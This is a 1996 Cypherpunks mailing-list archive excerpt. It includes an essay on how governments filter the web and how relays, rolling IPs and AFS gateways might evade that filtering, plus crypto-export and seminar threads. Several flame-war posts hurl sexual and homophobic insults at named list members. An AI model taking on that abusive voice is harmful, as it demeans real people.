2) Filtering on DNS names is an attack that proxy servers can use - the HTTP spec [RFC1945] says that requests to proxies need to send an Absolute URI (method://machine[:port][abs_path]) rather than just the absolute path (/etc.), so the proxy servers can filter on DNS names, defeating the rolling-IP-address defense. Doesn't stop relays. Non-proxy attacks don't have access to this method. However, governments that use full-scale firewalls and not just http proxies can also restrict what DNS queries the National DNS Servers will pass.

How to defend against it for non-proxy attackers? One way is to make it easy to find the IP address of a server with banned material - web indexers can find everything, so putting the IP form of the URL in a file that the popular indexers, along with useful keywords, is one way to make sure you get found. Another would be to deploy DNS servers widely (done:-) and maybe form-based interfaces for users that will run Dig or whatever.

3) Filtering on patterns in URLs - as with DNS filters, a proxy server run by an attacker can block access based on patterns in the URL, such as relay.pl. This makes it tougher to use relays as a defense, because they either need to have different names on different machines (harder for users to find and for administrators to implement without having to pay attention), or else to not need a name (either modify the protocols or at least the servers so that http://foo.bar.com/http://banned.site.org/stuff.html gets handled properly.) The latter is doable, but probably requires more administrator support?

Pattern matching on URLs can make it easier to attack AFS - you don't need to kill the whole AFS tree, just the banned parts.

Pattern matching on URLs already starts to have heavy volume issues - can a proxy server take the extra time to search an ever-larger banned list on every web hit? Having used overloaded proxy servers at work (:-), I'd expect the population to start acting like disgruntled postal workers if the mandatory national firewall is underpowered. On the other hand, I suppose a government could partially solve scale problems by requiring a license fee for use of the proxy server; a few bucks per user could pay for increasing numbers of servers as well as tracking who's reading what.

4) Filter on Patterns in PUT/GET Requests
As a defense against blocking URLs by patterns, defenders can send requests as message-body in PUT/GET requests; this is also useful for submitting banned material to cooperative sites. Attackers can filter on this material, though they can't easily filter out SSL or S-HTTP requests by content, depending on how much the protocols pass material end-to-end rather than link-by-link where the proxy can see it.

5) Filter on Patterns in Responses.
Similarly, attackers could just grep for banned material in HTTP responses, though SSL/S-HTTP both interfere with this. Defenders can also structure banned writing in ways that don't trigger patterns easily (e.g. don't refer to Lee Kwan Yew, just refer to That Bum or Mr. Big, etc.) Filtering on picture content is obviously difficult, so including text in graphics can help prevent attacks.

In general, I'd expect filtering attacks to be extremely susceptible to volume. On the other hand, attackers don't have to filter in real-time; they could scan material as a background activity, and go arrest the people who have received contraband after the fact, or just block their National Firewall Passports if they're reading too much. In general, this attack is probably more useful for overall study of what their subjects are reading than for real-time.

6) Traffic Analysis - who's reading what? Where? Who's reading a lot of contraband? What's popular foreign material? Which of the attackers' subjects are possible fellow travellers, based on what they're reading? This kind of material is useful for marketing as well as for identifying malcontents - businesses aren't always pro-privacy either, though they want their own secrets kept secret.

Many of the attacks above can work as after-the-fact analysis more effectively than they can as real-time blocking, and volume is less of a problem for crunching a sample of firewall logs than for active blocking; this may be the hardest attack to counter, though it's repression rather than censorship. If you can't police everybody, you can at least encourage the policeman in everybody's head.

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

What other kinds of attacks are there? What other defenses? What kinds of holes are there in these defenses?
# Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From Adamsc at io-online.com Sun Sep 29 22:30:46 1996 From: Adamsc at io-online.com (Adamsc) Date: Mon, 30 Sep 1996 13:30:46 +0800 Subject: Public Schools Message-ID: <19960930035040656.AAA252@IO-ONLINE.COM> On Sun, 29 Sep 96 07:55:34 +0000, attila wrote: > "That's our advantage at Microsoft; > we set the standards and we can change them." > --- Karen Hargrove, Microsoft > (quoted in the Feb 1993 Unix Review editorial) > > and, if this is not the gawd-awful truth, I must have just got > off the bus... typical, typical MS arrogance. > a toast! a toast to their early demise! Now there'd be an almost acceptable use of AP! I bet Team OS/2 alone would contribute enough to paste billg. Not to mention what IBM or Sun or Apple or Lotus or Borland or [company that got screwed] would do. # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # | send mail with subject "send PGPKEY" "That's our advantage at Microsoft; we set the standards and we can change them." --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial) From ponder at freenet.tlh.fl.us Sun Sep 29 22:32:38 1996 From: ponder at freenet.tlh.fl.us (P. J. Ponder) Date: Mon, 30 Sep 1996 13:32:38 +0800 Subject: The ever-vigilant John Anon Message-ID: >Date: Sun, 29 Sep 1996 14:38:01 -0700 >From: John Anonymous MacDonald >To: cypherpunks at toad.com >Subject: Does any body know anything about this? > >Is this just more snakeoil or is this real? This is quite real, and was posted on the CCC list a while ago. It turns out the Isaac Newton Institute for Mathematical Sciences (Cambridge, UK) has been having a regular series of seminars on crypto and papers from a distinguished group of presenters. Several of the agenda notices, etc., have been posted here from time to time, hidden in the usual spew. 
Look for the proceedings to be published by Springer Verlag. Do a web search on 'Information Hiding' or 'Turbo Codes' or just go look at: http://www.cl.cam.ac.uk/users/rja14/ihws.html Snake oil, indeed. > ><<<<<<<< FORWARDED MESSAGE >>>>>>>> >From: Ross Anderson >Date: Fri, 20 Sep 1996 09:05:28 +0100 >Subject: Seminar in Cryptology and Computer Security > > *** *** *** *** *** From Adamsc at io-online.com Sun Sep 29 22:39:25 1996 From: Adamsc at io-online.com (Adamsc) Date: Mon, 30 Sep 1996 13:39:25 +0800 Subject: The Petaflops Boondoggle Computer (was PET_ard) Message-ID: <19960930035040656.AAC252@IO-ONLINE.COM> On Sun, 29 Sep 1996 12:16:27 -0800, Timothy C. May wrote: >Symmetric multiprocessing is available, but it's often much less hassle to >have a single CPU running at 200 MHz than to try games with multiple >processors (which means more PCB real estate, more sockets, more of other >things). As far as SMP goes, it's actually not all that expensive. People in the linux-smp list have reported differences of as little as $50 for a uniprocessor vs. dual pentium system. Of course, every so often we'll get a message about a $30,000 system that can handle up to 64 Pentium Pros! # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # | send mail with subject "send PGPKEY" "That's our advantage at Microsoft; we set the standards and we can change them." --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial) From stewarts at ix.netcom.com Sun Sep 29 22:45:11 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Mon, 30 Sep 1996 13:45:11 +0800 Subject: Tools for Rendering Censorship Firewalls Ineffective Message-ID: <199609300305.UAA03732@netcomsv.netcom.com> I've been trying to categorize the web censorship techniques available to governments, such as Singapore and China's Firewall Curtains, Germany's ISP Threats, etc. 
The objective is to make information widely and conveniently available to subjects of the censoring country by building tools that will provide multiple paths to data that are easy to find and hard to block because they're too pervasive. I'm assuming that email is difficult to block, in-country public websites are blockable (through business licenses, lawsuits, rubber-hoses, or confiscation), in-country private websites are difficult to block but not very relevant, authors can afford and post to foreign web sites without effective blocking, and that the real "threat" to the government is foreign websites making banned information conveniently available to its subjects. I'm also assuming that the government can use humans to discover a moderate quantity of banned info, but that blocking will mostly be done by bots rather than human readers. In particular, I'm ignoring the approach of in-country hidden websites, since it's too vulnerable in some countries, and focussing on the web rather than email because it's mass-market and easier to use, and email is harder to stop, especially given crypto and remailers. Notation: "Attack" is the Censors trying to stop data; "defend" and "evade" are the Good Guys trying to not get censored. The obvious techniques I can see include 1) Filter on IP address (e.g. German attack on XS4ALL) 2) Filter on DNS Name 3) Filter on Patterns in URL 4) Filter on Patterns in PUT/GET Requests 5) Filter on Patterns in Response. 6) Traffic Analysis on reading patterns Defenses - The most important defenses to these attacks depend on ubiquity and volume - they can block one or two of anything, they might be able to block a thousand, and it's not possible to block millions of things everywhere. So building bridges between systems and increasing multiplicity is a win. 1) It's easy to evade the crude version of this attack - use rolling IP addresses, and use DNS to publish the new ones. 
For the German model, where the government has to tell the ISPs who to block, this wins. They can counter by blocking your whole IP network, not just a single machine, which you can counter by hopping IP networks as well as hosts, though that's more trouble (and blocking routes is probably easier than blocking hosts, since you do it at the routers, and harder to get people to turn back on.) They can also enforce boycotts on the ISP, as they did with XS4ALL - blocking most of the traffic to a site can affect its other traffic enough to be economically annoying. The attackers can counter by also tracking the address with a bot - if you change addresses hourly, they can change blocking addresses hourly, which may workable for somewhere high-tech like Singapore or very focussed like China, but isn't very effective for somewhere porous like Germany that has a system of laws that move at the speed of bureaucracy. A very effective defense against this method is to deploy relay servers, either anonymizers or simple non-anonymizing cgi scripts that take URLs like http://foo.bar.com/cgi-bin/relay.pl/http://banned.site.org/ and fetch and return the real URL (perhaps modifying any URLs in it to connect through the relay.) This works if there are lots of easy-to-find relay servers. An obvious approach would be to package the relay program with Apache or other popular web server, so anybody who didn't bother turning it off would have a relay named "relay.pl"; the attackers can't realistically block everybody who's got one. Another effective defense is to use web servers that gateway to AFS (Andrew File System) or other distributed file systems. This lets /stanford.edu/censored-mirrors/banned.html be accessible from any site supporting AFS, such as http://www.cmu.edu/afs/stanford.edu/censored-mirrors/banned.html This has the great advantage that AFS sites are usually at major universities, which are important enough that lots of people would complain if you blocked them. 
This works better if there's an easy way to insert things into the AFS tree - volunteers are fine, but if there are servers that can automatically import material it becomes easier, either by copying or by various kinds of indirection. (On the other hand, if you allow automated import, attackers can turn your site into the Child Pornography NarcoTerrorist Bomb Info Mart and ban you...) Do the major web crawlers index AFS? Or do the sites use robots.txt to prevent multiple crawls, e.g. by only allowing searching on the local file systems and not on the remote ones? 2) Filtering on DNS names is an attack that proxy servers can use - the HTTP spec [RFC1945] says that requests to proxies need to send an Absolute URI (method://machine[:port][abs_path]) rather than just the absolute path (/etc.), so the proxy servers can filter on DNS names, defeating the rolling-IP-address defense. Doesn't stop relays. Non-proxy attacks don't have access to this method. However, governments that use full-scale firewalls and not just http proxies can also restrict what DNS queries the National DNS Servers will pass. How to defend against it for non-proxy attackers? One way is to make it easy to find the IP address of a server with banned material - web indexers can find everything, so putting the IP form of the URL in a file that the popular indexers, along with useful keywords, is one way to make sure you get found. Another would be to deploy DNS servers widely (done:-) and maybe form-based interfaces for users that will run Dig or whatever. 3) Filtering on patterns in URLs - as with DNS filters, a proxy server run by an attacker can block access based on patterns in the URL, such as relay.pl. 
This makes it tougher to use relays as a defense, because they either need to have different names on different machines (harder for users to find and for administrators to implement without having to pay attention), or else to not need a name (either modify the protocols or at least the servers so that http://foo.bar.com/http://banned.site.org/stuff.html gets handled properly.) The latter is doable, but probably requires more administrator support?

Pattern matching on URLs can make it easier to attack AFS - you don't need to kill the whole AFS tree, just the banned parts.

Pattern matching on URLs already starts to have heavy volume issues - can a proxy server take the extra time to search an ever-larger banned list on every web hit? Having used overloaded proxy servers at work (:-), I'd expect the population to start acting like disgruntled postal workers if the mandatory national firewall is underpowered. On the other hand, I suppose a government could partially solve scale problems by requiring a license fee for use of the proxy server; a few bucks per user could pay for increasing numbers of servers as well as tracking who's reading what.

4) Filter on Patterns in PUT/GET Requests
As a defense against blocking URLs by patterns, defenders can send requests as message-body in PUT/GET requests; this is also useful for submitting banned material to cooperative sites. Attackers can filter on this material, though they can't easily filter out SSL or S-HTTP requests by content, depending on how much the protocols pass material end-to-end rather than link-by-link where the proxy can see it.

5) Filter on Patterns in Responses.
Similarly, attackers could just grep for banned material in HTTP responses, though SSL/S-HTTP both interfere with this. Defenders can also structure banned writing in ways that don't trigger patterns easily (e.g. don't refer to Lee Kwan Yew, just refer to That Bum or Mr. Big, etc.)
Filtering on picture content is obviously difficult, so including text in graphics can help prevent attacks. In general, I'd expect filtering attacks to be extremely susceptible to volume. On the other hand, attackers don't have to filter in real-time; they could scan material as a background activity, and go arrest the people who have received contraband after the fact, or just block their National Firewall Passports if they're reading too much. In general, this attack is probably more useful for overall study of what their subjects are reading than for real-time.

6) Traffic Analysis - who's reading what? Where? Who's reading a lot of contraband? What's popular foreign material? Which of the attackers' subjects are possible fellow travellers, based on what they're reading? This kind of material is useful for marketing as well as for identifying malcontents - businesses aren't always pro-privacy either, though they want their own secrets kept secret. Many of the attacks above can work as after-the-fact analysis more effectively than they can as real-time blocking, and volume is less of a problem for crunching a sample of firewall logs than for active blocking; this may be the hardest attack to counter, though it's repression rather than censorship. If you can't police everybody, you can at least encourage the policeman in everybody's head.

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

What other kinds of attacks are there? What other defenses? What kinds of holes are there in these defenses?

# Thanks; Bill
# Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com
#
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto

From dfloyd at io.com Sun Sep 29 22:54:10 1996
From: dfloyd at io.com (Douglas R. Floyd)
Date: Mon, 30 Sep 1996 13:54:10 +0800
Subject: Does any body know anything about this?
In-Reply-To: <199609292138.OAA27616@abraham.cs.berkeley.edu>
Message-ID: <199609300328.WAA21279@bermuda.io.com>

> > Is this just more snakeoil or is this real?

[Deleted -- Matt Blaze's seminar]

Matt Blaze isn't a snake oil type. He from what I have seen is one of the "good guys". I think, he is the maker of S/KEY, IIRC.

From varange at crl.com Sun Sep 29 23:02:13 1996
From: varange at crl.com (Troy Varange)
Date: Mon, 30 Sep 1996 14:02:13 +0800
Subject: [SPAM] More "fuckhead" fan mail from Timmy "peteur" May
In-Reply-To:
Message-ID: <199609300332.AA09870@crl12.crl.com>

> berserk
> Timmy May has gone . Has he been eating speed?
> bananas
>
> >From: Troy Varange
> >Message-Id: <199609300138.AA08482 at crl12.crl.com>
> >Subject: Re: [SPAM] More fan mail from Timmy "peteur" May
> >To: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
> >Date: Sun, 29 Sep 1996 18:38:05 -0700 (PDT)
> >In-Reply-To: from "Dr.Dimitri Vulis KOTM" at Sep 29, 96 07:14:50 pm
> >X-Mailer: ELM [version 2.4 PL23]
> >Mime-Version: 1.0
> >Content-Type: text/plain; charset=US-ASCII
> >Content-Transfer-Encoding: 7bit
> >Content-Length: 3442
> >
> >>
> >> What has Timmy been smoking?
> >>
> >> ]From paul at fatmans.demon.co.uk Sun Sep 29 19:03:40 1996
> >> ]Received: by bwalk.dm.com (1.65/waf)
> >> ] via UUCP; Sun, 29 Sep 96 19:14:06 EDT
> >> ] for dlv
> >> ]Received: from disperse.demon.co.uk by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP;
> >> ] id AA25790 for dlv at bwalk.dm.com; Sun, 29 Sep 96 19:03:40 -0400
> >> ]Received: from post.demon.co.uk ([(null)]) by relay-2.mail.demon.net id ac16129;
> >> ] 29 Sep 96 15:59 BST
> >> ]Received: from fatmans.demon.co.uk ([158.152.120.223]) by relay-3.mail.demon.net
> >> ] id aa09441; 29 Sep 96 15:54 BST
> >> ]Received: from fatmans.demon.co.uk by fatmans.demon.co.uk with SMTP
> >> ] id AA843903697 ; Sat, 28 Sep 96 09:41:37 +0000
> >> ]Comments: Authenticated sender is
> >> ]From: paul at fatmans.demon.co.uk
> >> ]To: "Dr.Dimitri Vulis KOTM"
> >> ]Date: Sat, 28 Sep 1996 09:21:37 +0000
> >> ]Mime-Version: 1.0
> >> ]Content-Type: text/plain; charset=US-ASCII
> >> ]Content-Transfer-Encoding: 7BIT
> >> ]Subject: Re: Possible subs attack????
> >> ]Priority: normal
> >> ]X-Pm-Encryptor: JN-PGP-P, 4
> >> ]X-Mailer: Pegasus Mail for Windows (v2.31)
> >> ]Message-Id: <844008901.9441.0 at fatmans.demon.co.uk>
> >> ]
> >> ]-----BEGIN PGP SIGNED MESSAGE-----
> >> ]
> >> ]
> >> ]> The lying sack of shit Timmy May writes:
> >> ]
> >> ]> The lying sack of shit Timmy May lies again, as usual.
> >> ]
> >> ]Fuck you,
> >> ]
> >> ]I am not Tim May, Check out the return path if you don`t believe me,
> >> ]if you still don`t here`s my PGP public key signed by the EFF, they
> >> ]don`t sign keys here and there without checking ID`s...
> >> ]
> >> ]Type Bits/KeyID Date User ID
> >> ]pub 1024/5BBFAEB1 1996/07/30 Paul Bradley
> >> ]
> >> ]
> >> ] Datacomms Technologies web authoring and data security
> >> ] Paul Bradley, Paul at fatmans.demon.co.uk
> >> ] Paul at crypto.uk.eu.org, Paul at cryptography.uk.eu.org
> >> ] Http://www.cryptography.home.ml.org/
> >> ] Email for PGP public key, ID: 5BBFAEB1
> >> ] "Don`t forget to mount a scratch monkey"
> >>
> >Fuckhead.
> Fuckhead.
We know your behind Vulis, Cock-sucker

From Adamsc at io-online.com Sun Sep 29 23:03:22 1996
From: Adamsc at io-online.com (Adamsc)
Date: Mon, 30 Sep 1996 14:03:22 +0800
Subject: [RANT] Re: Workers, Public Schools, Tradesmen, and Justice
Message-ID: <19960930035040656.AAB252@IO-ONLINE.COM>

On Sun, 29 Sep 1996 13:26:08 -0400 (EDT), Rabid Wombat wrote:

>> The old way was that your HS provided what the mythical average person needed
>> to go about life. College was for the more "complex" careers.

>Perhaps "high school" should end at age 16, with two years of publicly
>funded "junior college" or "technical school" available to those who
>select one or the other, and qualify. This would bring an adult-level
>decision earlier in life, and students would need to start thinking about
>which path to choose at about 14. Perhaps this would allow reality to set
>in at an earlier age. A high school diploma has become meaningless anyway
>- it is viewed as a "right."

How about a real simple rule: if you don't pass a standardized test (Call it the SATs w/800 of 1600 minimum) you repeat the grade - no maximum age! Might end some of those "easy A" classes I took.

>This wouldn't leave anyone condemned to a life of menial labor for a
>decision made at age 16 - there are plenty of successful people who have
>obtained a G.E.D. later in life, and then gone on to college. It would,
>however, give some measure of responsibility to the near-adult.

Yeah. I'd still say that you'd want to make it pretty easy to switch over - I've known a few people who were massively flip-flopping. Also, some kids may have hard times (parents divorce, etc) that might screw up their judgement for awhile. . .

>fiance did drop out of high school at age 16 and started college, with her
>parent's blessing. All her high school guidance counselor could come up
>with was "But she'll miss her prom"!

That seemed to be the general focus last year... "We may be idiots but we have school spirit!"
In CA, isn't there the option of taking CHSPE (sp?) that is like a GED but instead of sending the "I don't want this" message is more like "I don't want to waste my time"?

# Chris Adams | http://www.io-online.com/adamsc/adamsc.htp
# | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them." --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)

From dlv at bwalk.dm.com Sun Sep 29 23:09:14 1996
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 30 Sep 1996 14:09:14 +0800
Subject: [SPAM] Continuing "fuckhead" fan mail from Timmy "peteur" May
In-Reply-To: <199609300332.AA09870@crl12.crl.com>
Message-ID:

Timmy May has no life.

>From: Troy Varange
>Message-Id: <199609300332.AA09870 at crl12.crl.com>
>Subject: Re: [SPAM] More "fuckhead" fan mail from Timmy "peteur" May
>To: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
>Date: Sun, 29 Sep 1996 20:32:58 -0700 (PDT)
>In-Reply-To: from "Dr.Dimitri Vulis KOTM" at Sep 29, 96 09:45:41 pm
>X-Mailer: ELM [version 2.4 PL23]
>Mime-Version: 1.0
>Content-Type: text/plain; charset=US-ASCII
>Content-Transfer-Encoding: 7bit
>Content-Length: 4378
>
>> berserk
>> Timmy May has gone . Has he been eating speed?
>> bananas
>>
>> >From: Troy Varange
>> >Message-Id: <199609300138.AA08482 at crl12.crl.com>
>> >Subject: Re: [SPAM] More fan mail from Timmy "peteur" May
>> >To: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
>> >Date: Sun, 29 Sep 1996 18:38:05 -0700 (PDT)
>> >In-Reply-To: from "Dr.Dimitri Vulis KOTM" at Sep 29, 96 07:14:50 pm
>> >X-Mailer: ELM [version 2.4 PL23]
>> >Mime-Version: 1.0
>> >Content-Type: text/plain; charset=US-ASCII
>> >Content-Transfer-Encoding: 7bit
>> >Content-Length: 3442
>> >
>> >>
>> >> What has Timmy been smoking?
>> >>
>> >> ]From paul at fatmans.demon.co.uk Sun Sep 29 19:03:40 1996
>> >> ]Received: by bwalk.dm.com (1.65/waf)
>> >> ] via UUCP; Sun, 29 Sep 96 19:14:06 EDT
>> >> ] for dlv
>> >> ]Received: from disperse.demon.co.uk by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP;
>> >> ] id AA25790 for dlv at bwalk.dm.com; Sun, 29 Sep 96 19:03:40 -0400
>> >> ]Received: from post.demon.co.uk ([(null)]) by relay-2.mail.demon.net id ac16129;
>> >> ] 29 Sep 96 15:59 BST
>> >> ]Received: from fatmans.demon.co.uk ([158.152.120.223]) by relay-3.mail.demon.net
>> >> ] id aa09441; 29 Sep 96 15:54 BST
>> >> ]Received: from fatmans.demon.co.uk by fatmans.demon.co.uk with SMTP
>> >> ] id AA843903697 ; Sat, 28 Sep 96 09:41:37 +0000
>> >> ]Comments: Authenticated sender is
>> >> ]From: paul at fatmans.demon.co.uk
>> >> ]To: "Dr.Dimitri Vulis KOTM"
>> >> ]Date: Sat, 28 Sep 1996 09:21:37 +0000
>> >> ]Mime-Version: 1.0
>> >> ]Content-Type: text/plain; charset=US-ASCII
>> >> ]Content-Transfer-Encoding: 7BIT
>> >> ]Subject: Re: Possible subs attack????
>> >> ]Priority: normal
>> >> ]X-Pm-Encryptor: JN-PGP-P, 4
>> >> ]X-Mailer: Pegasus Mail for Windows (v2.31)
>> >> ]Message-Id: <844008901.9441.0 at fatmans.demon.co.uk>
>> >> ]
>> >> ]-----BEGIN PGP SIGNED MESSAGE-----
>> >> ]
>> >> ]
>> >> ]> The lying sack of shit Timmy May writes:
>> >> ]
>> >> ]> The lying sack of shit Timmy May lies again, as usual.
>> >> ]
>> >> ]Fuck you,
>> >> ]
>> >> ]I am not Tim May, Check out the return path if you don`t believe me,
>> >> ]if you still don`t here`s my PGP public key signed by the EFF, they
>> >> ]don`t sign keys here and there without checking ID`s...
>> >> ]
>> >> ]Type Bits/KeyID Date User ID
>> >> ]pub 1024/5BBFAEB1 1996/07/30 Paul Bradley
>> >> ]
>> >> ]
>> >> ] Datacomms Technologies web authoring and data security
>> >> ] Paul Bradley, Paul at fatmans.demon.co.uk
>> >> ] Paul at crypto.uk.eu.org, Paul at cryptography.uk.eu.org
>> >> ] Http://www.cryptography.home.ml.org/
>> >> ] Email for PGP public key, ID: 5BBFAEB1
>> >> ] "Don`t forget to mount a scratch monkey"
>> >>
>> >Fuckhead.
>> >Fuckhead.
We know your behind Vulis, Cock-sucker

From stewarts at ix.netcom.com Sun Sep 29 23:18:56 1996
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Mon, 30 Sep 1996 14:18:56 +0800
Subject: [CRYPTO] Does any body know anything about this?
Message-ID: <199609300436.VAA08532@netcomsv.netcom.com>

At 02:38 PM 9/29/96 -0700, some nobody wrote:
>Is this just more snakeoil or is this real?

Neither Matt Blaze nor Ross Anderson are particularly on the pro-snake-oil side.... Sounds like an interesting talk and I'd enjoy being there for a variety of reasons, including being able to time-travel back to Last Monday :-)

One difference between snake oil salesmen and mathematical cryptographers is that the latter talk about what they're doing, why it's as strong as it is, and how it relates back to other known hard problems or attack techniques. If this is sufficiently hard, cool.

Most of the symmetric-key attacks these days are based on being sufficiently messy to be hard to attack, and on resisting known attacks, but there's no particular way to prove how hard they are - you can just show that they're messier than any currently known techniques can untangle.

On the other hand, the experience with most public-key techniques is that it's hard to adapt NP-hard problems to crypto in ways that don't introduce special forms that can fall apart when handled right - the knapsack problem was a good example. Factoring and discrete-log still appear to be hard problems, but it would be nice to have other known-hard public-key systems. It would also be nice to have private-key systems that use NP-hard problems in strong ways, especially if it doesn't make them appallingly slow :-)

>TITLE: SYMMETRIC-KEY CIPHERS BASED ON HARD PROBLEMS
>A useful principle in cipher design is to reduce or at least relate
>closely the cryptanalysis of the cipher to some long-studied problem
>that is believed to be difficult. Most public-key ciphers follow this
>principle fairly closely (e.g., RSA is at least similar to factoring).
>Modern symmetric-key ciphers, on the other hand, can rarely be reduced
>in this way and so are frequently designed specifically to resist the
>various known cryptanalytic attacks. In this informal talk, we examine
>a simple cipher primitive, based on Feistel networks, for which recovery
>of its internal state given its inputs and outputs is NP-complete. We
>outline simple and efficient block- and stream- cipher constructions
>based on this primitive.

# Thanks; Bill
# Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com
#
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto

From perry at piermont.com Sun Sep 29 23:26:37 1996
From: perry at piermont.com (Perry E. Metzger)
Date: Mon, 30 Sep 1996 14:26:37 +0800
Subject: Does any body know anything about this?
In-Reply-To: <199609300328.WAA21279@bermuda.io.com>
Message-ID: <199609300431.AAA12492@jekyll.piermont.com>

"Douglas R. Floyd" writes:
> Matt Blaze isn't a snake oil type. He from what I have seen is one of the
> "good guys".

True.

> I think, he is the maker of S/KEY, IIRC.

False. He's done many cool things, but not S/KEY.

Perry

From stewarts at ix.netcom.com Sun Sep 29 23:56:08 1996
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Mon, 30 Sep 1996 14:56:08 +0800
Subject: Cryptography..
Message-ID: <199609300453.VAA09353@netcomsv.netcom.com>

At 03:03 AM 9/29/96 -0700, Erp wrote:
>What is the maximum encryption allowed to be created. With export
>restrictions in mind, and without export restrictions in mind...
>Thanks... By WORLD and US standards please...
The laws of nature don't appear to provide any maximum strength, assuming you run out of atoms to store your data before you run out of capacity for your computer, and _you'll_ be out of cash long before that :-) For mathematically strong algorithms, you can make the work a cracker has to do be exponentially larger than the amount of work you have to do to decrypt, so you win.

Different governments have different rules, and many have no rules. Bert-Jaap Koops has a summary that (last time I looked) was at
http://cwis.kub.nl/~frw/CRI/projects/bjk/lawsurvy.htm
about different governments' crypto use and export rules.

For the US, you can export cryptography software if you get permission, and you can usually get permission if you're using up to 40-bit symmetric-key keys and 512-bit public keys, or if you're writing software that's strictly for banking. You usually can't get permission for stronger crypto than that, unless you're a registered international arms dealer and are only selling your crypto gear to Friends Of The Pentagon.

There aren't any restrictions on the strength of crypto you can use for messages you're exporting, only on software you export. And there are somewhat bizarre interpretations of "export", including telling foreigners inside US borders if they're not US subjects.

Domestically, there are no restrictions on crypto you can write and use inside the US, subject of course to the bizarre interpretations of "domestically" that accompany "export".

# Thanks; Bill
# Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com
#
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto

From varange at crl.com Mon Sep 30 00:02:34 1996
From: varange at crl.com (Troy Varange)
Date: Mon, 30 Sep 1996 15:02:34 +0800
Subject: Vulis FUCKHEAD sucks Timmy's Cock
In-Reply-To:
Message-ID: <199609300441.AA10704@crl12.crl.com>

Vulis sucks Timmy's boyfriend's cock.

>
> Timmy May has no life.
>
> >From: Troy Varange
> >Message-Id: <199609300332.AA09870 at crl12.crl.com>
> >Subject: Re: [SPAM] More "fuckhead" fan mail from Timmy "peteur" May
> >To: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
> >Date: Sun, 29 Sep 1996 20:32:58 -0700 (PDT)
> >In-Reply-To: from "Dr.Dimitri Vulis KOTM" at Sep 29, 96 09:45:41 pm
> >X-Mailer: ELM [version 2.4 PL23]
> >Mime-Version: 1.0
> >Content-Type: text/plain; charset=US-ASCII
> >Content-Transfer-Encoding: 7bit
> >Content-Length: 4378
> >
> >> berserk
> >> Timmy May has gone . Has he been eating speed?
> >> bananas
> >>
> >> >From: Troy Varange
> >> >Message-Id: <199609300138.AA08482 at crl12.crl.com>
> >> >Subject: Re: [SPAM] More fan mail from Timmy "peteur" May
> >> >To: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
> >> >Date: Sun, 29 Sep 1996 18:38:05 -0700 (PDT)
> >> >In-Reply-To: from "Dr.Dimitri Vulis KOTM" at Sep 29, 96 07:14:50 pm
> >> >X-Mailer: ELM [version 2.4 PL23]
> >> >Mime-Version: 1.0
> >> >Content-Type: text/plain; charset=US-ASCII
> >> >Content-Transfer-Encoding: 7bit
> >> >Content-Length: 3442
> >> >
> >> >>
> >> >> What has Timmy been smoking?
> >> >>
> >> >> ]From paul at fatmans.demon.co.uk Sun Sep 29 19:03:40 1996
> >> >> ]Received: by bwalk.dm.com (1.65/waf)
> >> >> ] via UUCP; Sun, 29 Sep 96 19:14:06 EDT
> >> >> ] for dlv
> >> >> ]Received: from disperse.demon.co.uk by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP;
> >> >> ] id AA25790 for dlv at bwalk.dm.com; Sun, 29 Sep 96 19:03:40 -0400
> >> >> ]Received: from post.demon.co.uk ([(null)]) by relay-2.mail.demon.net id ac16129;
> >> >> ] 29 Sep 96 15:59 BST
> >> >> ]Received: from fatmans.demon.co.uk ([158.152.120.223]) by relay-3.mail.demon.net
> >> >> ] id aa09441; 29 Sep 96 15:54 BST
> >> >> ]Received: from fatmans.demon.co.uk by fatmans.demon.co.uk with SMTP
> >> >> ] id AA843903697 ; Sat, 28 Sep 96 09:41:37 +0000
> >> >> ]Comments: Authenticated sender is
> >> >> ]From: paul at fatmans.demon.co.uk
> >> >> ]To: "Dr.Dimitri Vulis KOTM"
> >> >> ]Date: Sat, 28 Sep 1996 09:21:37 +0000
> >> >> ]Mime-Version: 1.0
> >> >> ]Content-Type: text/plain; charset=US-ASCII
> >> >> ]Content-Transfer-Encoding: 7BIT
> >> >> ]Subject: Re: Possible subs attack????
> >> >> ]Priority: normal
> >> >> ]X-Pm-Encryptor: JN-PGP-P, 4
> >> >> ]X-Mailer: Pegasus Mail for Windows (v2.31)
> >> >> ]Message-Id: <844008901.9441.0 at fatmans.demon.co.uk>
> >> >> ]
> >> >> ]-----BEGIN PGP SIGNED MESSAGE-----
> >> >> ]
> >> >> ]
> >> >> ]> The lying sack of shit Timmy May writes:
> >> >> ]
> >> >> ]> The lying sack of shit Timmy May lies again, as usual.
> >> >> ]
> >> >> ]Fuck you,
> >> >> ]
> >> >> ]I am not Tim May, Check out the return path if you don`t believe me,
> >> >> ]if you still don`t here`s my PGP public key signed by the EFF, they
> >> >> ]don`t sign keys here and there without checking ID`s...
> >> >> ]
> >> >> ]Type Bits/KeyID Date User ID
